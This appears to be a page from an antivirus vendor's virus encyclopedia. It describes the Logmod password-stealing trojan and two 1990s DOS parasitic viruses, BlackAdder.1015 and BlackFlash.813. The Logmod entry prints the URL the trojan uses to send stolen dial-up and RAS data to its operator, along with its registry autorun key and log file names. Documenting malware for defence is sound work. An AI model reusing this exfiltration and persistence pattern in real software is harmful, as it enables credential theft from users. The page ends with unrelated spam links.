Trojan.PSW.Logmod.a
Description Trojan.PSW.Logmod.a
The Logmod program belongs to the family of password stealing trojans.
Logmod steals the following information: Windows version, Explorer version, phone book entries, service provider information, RAS data, modem log, e.t.c.
When run the trojan installs itself into the system. While installing the Logmod trojan registers itself in the system registry auto-run section:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
Sysres = Sysres.exe
The trojan does not copy/move its file to any other directory, thus it cannot automatically run on Windows boot-up (except if it is originally placed in the Windows or Windows system directory). Therefore, for example, it cannot "install" itself into the system while being run from email attachments. There should be an additional component ("dropper") that installs the trojan into the system.
To send stolen data out of infected computers the Logmod opens an Internet URL with the following request:
http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login= %data%
'%data%' contains stings with stolen information that are sent to that URL. Apparently the SysWeb.php at that site gets %data% upon request and passes it to the trojan "master".
Miscellaneous
Logmod creates additional files in the Windows directory:
SysTrace.daf, CallTrace.daf, DialTrace.daf
These files contain data that is logged/stolen.
The Logmod trojan also creates the following additional registry key for its internal use:
HKLMSoftwareDIALPASS
DateEspana4
Check other viruses! Be aware! Use Antiviral Software
BlackAdder.1015
Description BlackAdder.1015
It is a dangerous memory resident encrypted parasitic virus. It hooks INT 21h and writes itself to the end of COM- and EXE-files that are accessed. The virus does not infect the files with the names: *AV.*, *AN.*. The virus deletes the CHKLIST.MS files, contains the text strings:
Black Adder(C)94/95
-made in Italy by Doctor Who-
-Life's a journey not a destinationall-
CHKLIST MS
Wh
BlackFlash.813
Description BlackFlash.813
It is a dangerous memory resident encrypted parasitic virus. It hooks INT 21h and writes itself to the end of EXE files that are executed. The virus does not infect files: TB*, SC*, KR*, WI*, F-* (anti-virus programs and Windows). The virus has bugs and may corrupt files while infecting them, or halt the system while installing memory resident. The virus contains the text strings:
G:LoGiNLoGiN.eXe
FAIRGROUND (c) BlackFlash!
|
Home
Viruses from A to Z
0-9
A
B
Ñ
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
Download K-19: The Widowmaker Dvd
Spa Gift Baskets
Top StÄd Service Km
Fairmonth
FÄrnstrÖm, Olof
|